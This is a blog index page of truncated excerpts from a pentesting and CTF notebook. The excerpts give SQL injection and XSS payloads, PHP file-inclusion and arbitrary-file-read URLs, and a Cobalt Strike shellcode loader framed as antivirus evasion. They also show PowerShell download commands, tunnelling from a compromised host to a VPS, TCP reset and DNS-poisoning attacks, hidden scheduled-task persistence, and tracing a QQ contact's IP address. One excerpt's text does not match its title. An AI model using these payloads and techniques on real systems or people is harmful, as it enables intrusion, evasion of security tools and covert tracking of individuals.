![](https://img-blog.csdnimg.cn/20190927151132530.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
学海无涯
CTF笔记
时光凉春衫薄
这个作者很懒,什么都没留下…
展开
-
本地密码爆破
linux中 /etc/passwd和shadow这两个文件是孪生兄弟,如果passwd文件中密码部分是用X来代替的话说明他的密码是在shadow中保存了。--wordlist=/usr/share/wordlists/rockyou.txt 指定密码文件。--format=crypt 选择类型。hash 指明包含密码的文件。通过命令将hash的密码保存下来。通过john工具进行密码对撞。原创 2023-06-07 16:31:58 · 285 阅读 · 0 评论 -
notepad运行代码(装机环境)
notepad 运行代码原创 2022-07-03 22:31:56 · 1407 阅读 · 2 评论 -
cobaltstrike linux上线方法
cobaltstrike linux上线方法原创 2022-01-15 18:22:58 · 6095 阅读 · 0 评论 -
SQLMAP-绕过脚本,混淆脚本
sqlmap-tamper 在kali 的储存位置为/usr/share/sqlmap/tamper当我们对于一些特殊的字符做替换的时候我们可以通过tamper中的脚本进行自动化的更改我们发送的payload这里举个注入的例子我们正常的攻击求如下:sqlmap 上普通注入命令如下:sqlmap -u "http://192.168.1.134/mutillidae/index.php?page=user...原创 2022-01-13 11:34:43 · 2137 阅读 · 0 评论 -
Fastjson 远程命令执⾏漏洞
什么是 Fastjson Fastjson是阿⾥开发的⼀款专门⽤于Java开发的包,可以⽅便的实现 json 对象与 JavaBean 对象的转换,JavaBean 对象与 json 字 符串的转换, json 对象与 json 字符串的转换。API 使⽤//序列化String text = JSON.toJSONString(obj);//反序列化VO vo = JSON.parse(); //解析为JSONObject类型或者JSONArray类型VO vo = JSON.pars原创 2022-01-06 13:57:57 · 2108 阅读 · 0 评论 -
Apache-Log4j2复现过程
log4j-复现原创 2022-01-01 20:13:51 · 670 阅读 · 0 评论 -
shellcode 免杀 ——python3
python shellcode 免杀上线原创 2021-12-28 18:44:08 · 1855 阅读 · 0 评论 -
Cobaltstrike dns上线 (观察流量)
今天做了一个cs-dns的上线过程,发现这个上限的方式还是挺隐蔽的。通过ip查询起来的话很难被追溯到。所有的流量全部是通过dns端口来做控制的。首先通过exe的木马确保上限然后在被控端端开启wireshark随后在控制端下一个命令下面是我在下达命令之后的一个完整流量截图,其中像这种txt api.xxx post.xxxx之类的都是cs在传输数据的特征。这个图片其实不大,但是用dns的端口去用来传输数据的话这个就很慢了流量差不多这个地方才结束吧。截取桌面的这个动作差...原创 2021-12-09 15:29:55 · 5350 阅读 · 0 评论 -
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)
产品样子Django在2019年8月1日发布了一个安全更新,修复了在JSONField、HStoreField两个模型字段中存在的SQL注入漏洞。参考链接: Django security releases issued: 2.2.4, 2.1.11 and 1.11.23 | Weblog | Django Django JSONField SQL注入漏洞(CVE-2019-14234)分析与影响 | 离别歌 该漏洞需要开发者使用了JSONField/HStoreFi.原创 2021-12-07 17:34:17 · 1316 阅读 · 0 评论 -
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。具体原理请参考: Discuz! 6.x/7.x 全局变量防御绕过导致命令执行 - SecPulse.COM | 安全脉搏 产品样子直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray.原创 2021-12-07 16:00:08 · 1126 阅读 · 0 评论 -
Couchdb 任意命令执行漏洞(CVE-2017-12636)
产品样子该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。首先通过(CVE-2017-12635)漏洞创建一个用户qwe 密码也是qwe1.6.0 下的说明依次执行如下请求即可触发任意命令执行:查看命令执行的结果按照 vulhub中提示的环境来看这些命令也可以通过curl命令进行其中,`vulhub:vulhub`为管理员账号密码。curl -X PUT 'ht...原创 2021-12-07 15:38:30 · 1917 阅读 · 0 评论 -
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Ja原创 2021-12-07 13:52:56 · 2454 阅读 · 0 评论 -
Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)
产品样子Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的.原创 2021-12-06 16:54:53 · 740 阅读 · 0 评论 -
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。产品样子:漏洞复现登录界面?后边locale=../../../../../../../../../../etc/passwd%00en即可读取后台用户密码locale=../../..原创 2021-12-06 15:03:23 · 260 阅读 · 0 评论 -
AppWeb认证绕过漏洞(CVE-2018-8715)
AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 f原创 2021-12-06 13:31:43 · 149 阅读 · 0 评论 -
Apereo CAS 4.1 反序列化命令执行漏洞
产品样子影响范围: Apereo CAS <= 4.1.7http://your-ip:8080/cas/login即可查看到登录页面。我们使用(apereo-cas-attack-1.0-SNAPSHOT-all.jar)来复现这个漏洞。使用ysoserial的CommonsCollections4生成加密后的Payload:jar文件下载地址https://github.com/vulhub/Apereo-CAS-Attack/releases.java -jar ...原创 2021-11-26 17:20:00 · 1489 阅读 · 0 评论 -
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
产品界面默认的账号密码都是 admin admin (这里先说一下后面会提到只有登录后才可以往里面写shell)登录后去访问这个固定的界面(这是一个产品自身情况检查的一个固定界面)http://192.168.1.53:8161/admin/test/systemProperties.jsp访问这个界面后我们可以看到该服务器的一些绝对路径(上传木马的时候会用到)这里做个背景简述ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中...原创 2021-11-26 15:39:18 · 1282 阅读 · 0 评论 -
sql注入报错注入-ctf
找数据库?id=1' union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a%23获取表名?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='secur原创 2021-08-11 17:08:22 · 221 阅读 · 0 评论 -
xss-javascript发送数据包-ctf
javascript 制作存储型xss发送数据包<script> xhr = new XMLHttpRequest(); xhr.open("post", "/bWAPP/xss_stored_1.php", true); //请求类型,url xhr.setRequestHeader('content-type', 'application/x-www-form-urlencoded'); //头部字段 xhr.send("entry=" + docu原创 2021-08-11 12:36:21 · 371 阅读 · 0 评论 -
php序列化和反序列化-ctf
<?phperror_reporting(0);include "key4.php";$TEMP = "Whatever is worth doing is worth doing well.";$str = $_GET['str'];if (unserialize($str) === $TEMP){ echo "$key4";}show_source(__FILE__);通过上述得知unserialize($str)中反序列化后的值等于Whatever is worth.原创 2021-08-08 22:33:27 · 1104 阅读 · 0 评论 -
PHP 文件包含 -ctf
php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini”http://192.168.43.173:8999/lsawebtest/phptest/phprotocol1.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==也可以用来读php文件源码:data:text/plain,<?phpsystem(‘c..原创 2021-08-08 22:28:09 · 643 阅读 · 0 评论 -
SQL注入常用到的绕过方式-ctf
Syslog配置然后保存就好了syslog日志的操作集就创建完了123最后保存应用设置cpu告警的值在什么地方???...原创 2021-08-08 22:02:10 · 1283 阅读 · 0 评论 -
linux 查看文件内容的方式-ctf
cat:从第一行开始显示文本内容(适用于内容较少的) tac:从最后一行开始显示,是 cat 的逆顺序 more:一页一页的显示文本内容(适用于内容较多的) less:与 more 类似,但是比 more 更好的是,它可以往前翻页! head:只看文本的前面几行 tail:只看文本的后面几行 nl:显示文本内容与行号 ...原创 2021-08-08 21:31:46 · 475 阅读 · 0 评论 -
Apache Solr 任意文件读取复现
Apache Solr然后访问这个目录就可以拿到当前db的名字 http://[ip]/solr/admin/cores?indexInfo=false&wt=json然后把得到的名字在这个url中替换掉就可以任意的读取文件http://[IP]/solr/[name]/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd...原创 2021-04-09 16:19:26 · 234 阅读 · 0 评论 -
google常用语法
1、双引号把搜索词放在双引号中,代表完全匹配搜索,也就是说搜索结果返回的页面包含双引号中出现的所有的词,连顺序也必须完全匹配。bd和Google 都支持这个指令。例如搜索: “seo方法图片”2、减号减号代表搜索不包含减号后面的词的页面。使用这个指令时减号前面必须是空格,减号后面没有空格,紧跟着需要排除的词。Google 和bd都支持这个指令。例如:搜索 -引擎返回的则是包含“搜索”这个词,却不包含“引擎”这个词的结果3、星号星号*是常用的通配符,也可以用在搜索中。百度不支持*号原创 2021-02-04 11:17:25 · 4408 阅读 · 0 评论 -
windows中内置的上传下载工具
powershellpowershell是windows7之后自带的模块,这个功能非常强大可以对内核 windows API无限访问。powershell完全可信,因此通常被安全软件忽略。powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('文件的下载路径', '本地文件保存路径')或者$client = new-object System.Net.WebClient$client.Downloa原创 2020-09-21 16:32:12 · 540 阅读 · 0 评论 -
通过端口查文件
原创 2020-09-05 21:04:25 · 462 阅读 · 0 评论 -
分块传输绕-WAF
分块传输-绕waf今天新学了一个知识点通过分块传输过waf具体原理如下这个方法百试百灵基本上通杀所有的WAF。原创 2020-07-29 21:26:27 · 1080 阅读 · 0 评论 -
Cobait strike python ShellCoded 使用方法
python 的shellcode 利用方法第一步生成payload查看文件然后下面的代码是python2的代码 将里面的buf替换掉from ctypes import *import ctypes# length: 614 bytesbuf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\xf\74\xb6\x66\x8b原创 2020-07-17 11:53:01 · 492 阅读 · 0 评论 -
ew端口转发
端口转发目的:将192.168.1.61的22端口转发至vps的9081端口1.在公网vps(120.92.xx.xx)添加转接隧道,将9081端口收到的代理请求转交给9090端口;./ew_for_linux64 -s lcx_listen -l 9018 -e 9090(vps)2.沦陷主机利用lcx_slave方式,将公网VPS的9090端口和B主机的22端口连接起来;./ew_for_Win.exe -s lcx_slave -d 120.92.xx.xx...原创 2020-07-15 21:21:51 · 1768 阅读 · 0 评论 -
Ettercap dns 毒化攻击
本文仅以技术学习为主!攻击目的:将网络内所有的机器通过dns欺骗的方式强行的将受害者的浏览器重定向到指定的界面上去。环境:kalivi /etc/ettercap/etter.dns 编辑配置文件选择监听的接口...原创 2020-05-26 11:34:18 · 896 阅读 · 0 评论 -
netwox 67 扫描开放的tcp端口
netwox 67 -i 192.168.1.61 -p 1-65535 | grep open扫描 192.168.1.61 的 1至65535端口 过滤只看开放的该种扫描只看端口是否支持tcp的连接较为安全原创 2020-05-26 09:32:50 · 447 阅读 · 0 评论 -
tcp reset(RST)攻击
netwox 78 -i 192.168.2.31打开kali 直接输入上述命令 即可造成192.168.2.31的全部tcp连接全部断掉。原理:RST攻击也称伪造TCP重置报文攻击,它通过更改TCP协议头的标志位中的“reset”比特位(0变1),来关闭掉一个TCP会话连接。...原创 2020-05-25 16:55:23 · 2054 阅读 · 0 评论 -
QQ的ip定位
如何通过qq去定位好友的IP地址(仅供学习参考)方法有多种我这里演示两种方法第一种通过任务管理器分析这里面监控的进程只有qq然后给好友打qq电话,较为安静的网络下再打qq电话时发送字节数突然增高的即为对方ip方法二(分析工具过滤)这里用的时火绒剑打开之后如下图:然后再把干扰的告警过滤掉只留下网络连接的告警然后给他打电话就算他不接也没关系只要在线就好...原创 2020-05-25 15:35:16 · 4471 阅读 · 3 评论 -
windows如何创建计划任务并在窗口界面隐藏运行
#利用schtasks创建计划任务schtasks /create /tn "qwer" /tr "notepad.exe" /sc onlogon该条dos命令为创建 qwer这个任务名(/tr) 然后运行notepad.exe命令(/tr) 并且在用户登录的时候执行(/sc)#powershell隐藏执行终端powershell -windowstyle hidden...原创 2020-05-05 19:55:27 · 2563 阅读 · 1 评论 -
python3端口扫描脚本
扫描主机端口的脚本import socketimport timefrom threading import Thread#2.启动多线程运行扫描函数def main(target): print("开始扫描%s"%scanIP) for port in range(1,20000): t = Thread(target=portscan,args=...原创 2020-05-05 18:08:14 · 724 阅读 · 1 评论 -
python3文件上传脚本
自己模仿写的小脚本方便以后使用#1首先定义usage函数以输出帮助信息#2利用getpot方法获取命令行参数#3区分客户端和服务端#4编写客户端和服务端函数#5编写上传函数和下载函数import sysimport getoptimport socketimport timeupfile=""#代码开始入口def main(): global upfil...原创 2020-05-05 18:05:41 · 799 阅读 · 1 评论 -
linux目录说明
【常见目录说明】目录/bin存放二进制可执行文件(ls,cat,mkdir等),常用命令一般都在这里。/etc存放系统管理和配置文件/home存放所有用户文件的根目录,是用户主目录的基点,比如用户user的主目录就是/home/user,可以用~user表示/usr用于存放系统应用程序,比较重要的目录/usr/local 本地系统管理员软件安装...原创 2020-04-05 21:05:44 · 923 阅读 · 0 评论 -
WAF 的诡异编码绕过
今天学到一个非常有意思的编码方式,我发现该种编码基本上可以打穿所有的waf产品。原理很简单,通过一些异或运算将所有的敏感函数全部转换为有趣的自定义函数,包括一些颜文字之类的具体原理请参照我之前的文章这里只列张图:https://blog.csdn.net/qq_38656841/article/details/102552004这种编码网上有现成的转换工具人家都写好了只需要将你的p...原创 2020-03-31 11:08:07 · 429 阅读 · 0 评论 -
nps服务器 内网穿透
今天教大家搭建 nps服务器 内网穿透公司的环境在公网无法进行访问nps服务可以将内网服务映射到公网演示图:下面演示步骤:首先你要有台云服务器配置服务器端然后将这个云服务器的防火墙根据要求打开。。。。。然后登录该服务器(我这个是centos7的)下载链接wget https://github.com/cnlh/nps/releases/download/v0...原创 2019-12-31 23:41:01 · 6476 阅读 · 6 评论